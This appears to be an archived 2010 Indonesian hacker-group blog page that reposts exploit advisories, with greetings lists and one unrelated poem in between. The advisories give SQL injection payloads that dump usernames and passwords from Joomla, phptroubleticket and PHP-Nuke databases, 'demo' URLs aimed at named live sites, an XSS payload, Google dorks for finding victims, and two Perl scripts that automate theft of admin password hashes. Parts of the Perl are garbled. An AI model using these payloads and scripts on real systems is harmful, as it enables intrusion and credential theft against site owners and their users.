[!]===========================================================================[!]
[~] Joomla Component com_hezacontent SQL injection Vulnerability (id)
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 9 march, 2010
[!]===========================================================================[!]
[ Software Information ]
[+] Vendor : ttp://joomlacode.org/
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://joomlacode.org/gf/download/frsrelease/11313/46163/com_hezacontent.zip
[+] Version : 1.0
[!]===========================================================================[!]
[ Vulnerable File ]http://127.0.0.1/index.php?option=com_hezacontent&view=item&id=[INDONESIANCODER]
[ XpL ]-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users--
[ d3m0 ]http://bbh.coadesign.org/index.php?option=com_hezacontent&view=item&id=-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users--
dan lain sebagainya ;]
[!]===========================================================================[!]
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Pathloader,cimpli,MarahMerah,senot,all INDONESIANCODER MEMBERS
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue-
[+] #becak - #indonesiancoder - #kill-9
[ NOTE ]
[+] Rawk !
[+] gonzhack : buruan kesini dodolllllllllllllllllll !!
[ QUOTE ]
[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..
[+] ./e0f
Selasa, 09 Maret 2010
Joomla Component com_hezacontent SQL injection Vulnerability (id)
Minggu, 07 Maret 2010
PHPAUCTIONS XSS Vulnerabilities
#############################################################################################################
## Tittle :PHPAUCTIONS XSS Vulnerabilities ##
## Author : SENOT (selalungantuk_exe@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Thursday 04 March, 2010 ##
## Location : - INDONESIA - ##
#############################################################################################################
[+] INFO
[+] Name : PHPAUCTIONS
[+] Vendor : http://phpauctions.info/
[+] Vulnerability : XSS
[+] Dork : "Dork Just for newbie"
#############################################################################################################
[ Vulnerable File ][+] http://127.0.0.1[senot]/feedback.php?id=[INDONESIANCODER]
[ DEMO ][+] http://phpauctions.info/demo/feedback.php?id=29/%3E%22%3E%3Cscript%3Ealert%28123456789%29%3C/script%3E&faction=show
#############################################################################################################
[ Thx TO ]
[+] INDONESIAN CODER - ServerIsDown - IndonesianHacker - SoldierOfAllah
[+] kaMtiEz,Tukulesto,M3NW5,arianom,gonzhack,tucker,saint
[+] B4YU5154,nuxdtyals,qu1ck_51lv3r,Mr.J0k3R,brandal_666
[+] elv1n4,Mr.fribo,Jack,VycOd,x-shadow,bobyhikaru,deril0101
[+] ex girlfriend ( you Are my Spirit )
[+] And you
[ NOTES ]
[+] kaMtiEz for ayy . . u will be mine
[+] Get the codes and Feel the Soul ( INDONESIANCODER TEAM )
Kamis, 04 Maret 2010
PHPNUKE CMS ( Survey&poll ) SQLi vuln
#############################################################################################################
## Tittle :PHPNUKE CMS ( Survey&poll ) SQLi Vulner ##
## Author : SENOT (selalungantuk_exe@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Thursday 04 March, 2010 ##
## Location : - INDONESIA - ##
#############################################################################################################
[+] CMS INFO
[+] Name : PHPNUKE CMS
[+] Vendor : http://phpnuke.org/
[+] Download : http://phpnuke.org/modules.php?name=Downloads
[+] Vulnerability : SQL
[+] Dork : "Dork Just for newbie"
#############################################################################################################
[ Vulnerable File ]
[+] http://127.0.0.1/[senot]/modules.php?name=Surveys&op=results&pollID=[INDONESIANCODER]
[ XpL ]
[+] +and+1=2+union+select+1,version(),3,4--
[ DEMO ]
[+] http://server/modules.php?name=Surveys&op=results&pollID=5+and+1=2+union+select+1,version%28%29,3,4--
[+] http://server/default.php?go=modules.php%3Fname%3DSurveys%26op%3Dresults%26pollID%3D132+and+1=2+union+select+1,version%28%29,3,4--
#############################################################################################################
[ Thx TO ]
[+] INDONESIAN CODER - ServerIsDown - IndonesianHacker - SoldierOfAllah
[+] kaMtiEz,Tukulesto,M3NW5,arianom,gonzhack,tucker,saint
[+] B4YU5154,nuxdtyals,qu1ck_51lv3r,Mr.J0k3R,brandal_666
[+] elv1n4,Mr.fribo,Jack,VycOd,x-shadow,bobyhikaru,deril0101
[+] ex girlfriend ( you Are my Spirit )
[+] And you
[+] Get the codes and Feel the Soul ( INDONESIANCODER TEAM )
Selasa, 02 Maret 2010
bintang jatuhku
bintang jatuhku
waktu aku sedang sendiri ...
adakah kau pernah mengerti ..
semua teman ku telah pergi ..
dan engkau pun tiada disini ...
malam2 seperti ini ..
sungguh sangat tidak berarti ..
bulan2 bintang2 pun letih ..
dan langit pun gelap sekali ...
hingga aku sadarkan diri ..
engkau lewat di depan ku ...
bintang jatuh kau kah itu ,,
jangan kau kecewakan aku ..
tak ada yang dapat ku lakukan
selain wait and see ..
aku tunggu kau sampai kau muncul dihadapan ku !
wahai bintang jatuhku !
ku terpesona melihatmu ..
indah mu takjubkan pikiran ku .
inginku milikimu ..
suatu saat kau kan jadi milik ku ..
hanya butuh waktu .. :D
EOF
Senin, 01 Maret 2010
phptroubleticket SQL injection (id)
#############################################################################################################
## phptroubleticket SQL injection (id) ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : 1 march, 2010 ##
#############################################################################################################
[ Software Information ]
[+] Vendor : http://www.phptroubleticket.org/
[+] Download : http://www.phptroubleticket.org/downloads.html
[+] version : 2.0 / lower maybe also affected
[+] Vulnerability : SQL
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################
[ Vulnerable File ]http://127.0.0.1/[kaMtiEz]/vedi_faq.php?id=[INDONESIANCODER]
[ XpL ]/**/union/**/all/**/select/**/1,concat_ws(0x3a,email,password)kaMtiEz,3,4/**/from/**/utenti--
[ DEMO ]http://ww2.unime.it/ingegneria/new/assistenza/vedi_faq.php?id=666/**/union/**/all/**/select/**/1,concat_ws(0x3a,email,password)kaMtiEz,3,4/**/from/**/utenti--
[ FIX ]
dunno :">
#############################################################################################################
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack,senot
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
[ NOTE ]
[+] Ayy : U will be owned ;]
[+] Don Tukulesto : kemana kamu woeeeee
[+] IBL13Z : belajar terus yak ;]
[ QUOTE ]
[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..
Rabu, 24 Februari 2010
Joomla Component com_hdflvplayer SQL injection exploit - (id)
#!/usr/bin/perl -w
###############################################################################################
#
# [~] Joomla Component com_hdflvplayer SQL injection exploit - (id)
# [~] Author : kaMtiEz (kamzcrew@yahoo.com)
# [~] Homepage : http://www.indonesiancoder.com
# [~] Date : 15 February, 2010
#
###############################################################################################
#
# [ Software Information ]
#
# [+] Vendor : http://www.hdflvplayer.net/
# [+] Price : $ 99.00
# [+] Vulnerability : SQL injection
# [+] Dork : inurl:"CIHUY"
# [+] Type : commercial
#
###############################################################################################
#
# USAGE : perl kaMz.pl
#
###############################################################################################print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [~] INDONESIANCODER TEAM [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [!]Joomla component com_hdflvplayer SQL injection exploit[!] \n\n";
print "\t\t [~] by kaMtiEz [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
use LWP::UserAgent;
print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
chomp(my $IBL13Z=
$kaMtiEz="concat(username,0x3a,password)";
$tukulesto="jos_users";
$pathloader="com_hdflvplayer";
$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$arianom = $IBL13Z . "/index.php?option=".$pathloader."&id=1+AND+1=2+UNION+SELECT+".$kaMtiEz.",1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$tukulesto."--";
$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n";
}
else{print "\n[+] Exploit GAGAL GAN ![+]\n";
}
##############################################################################################
#
# GREETZZZZZ :
#
# INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
# tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
# Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13z,r3m1ck
# Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
#
##############################################################################################
Joomla Component com_joaktree SQL injection Exploit vulnerability - (treeId)
#!/usr/bin/perl -w
###########################################################################################
#[~] Joomla Component com_joaktree SQL injection Exploit vulnerability - (treeId)
#[~] Author : kaMtiEz (kamzcrew@yahoo.com)
#[~] Homepage : http://www.indonesiancoder.com
#[~] Date : 20 February, 2010
############################################################################################
#
#[ Software Information ]
#
#[+] Vendor : http://joaktree.com/
#[+] Download : http://joaktree.com/index.php/en/joaktree/downloads
#[+] version : 1.1.1 or lower maybe also affected
#[+] Vulnerability : SQL injection
#[+] Dork : inurl:"com_joaktree"
#[+] Type : Free
#
###############################################################################################
#
# USAGE : perl kaMz.pl
#
###############################################################################################print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [~] INDONESIANCODER TEAM [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [!]Joomla component com_joaktree SQL injection exploit[!] \n\n";
print "\t\t [~] by kaMtiEz [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
use LWP::UserAgent;
print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
chomp(my $IBL13Z=
$kaMtiEz="concat(username,0x3a,password)";
$tukulesto="jos_users";
$Pathloader="version()";
$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$arianom = $IBL13Z . "/index.php?option=com_joaktree&view=joaktree&treeId=-1+union+all+select+1,2,3,".$Pathloader.",5,".$kaMtiEz.",7,8,9,10,11,12,13,14,15,16+from+".$tukulesto."--";
$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n";
}
else{print "\n[+] Exploit GAGAL GAN ![+]\n";
}
##############################################################################################
#
# GREETZZZZZ :
#
# INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
# tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
# Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13z,r3m1ck
# Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
#
##############################################################################################
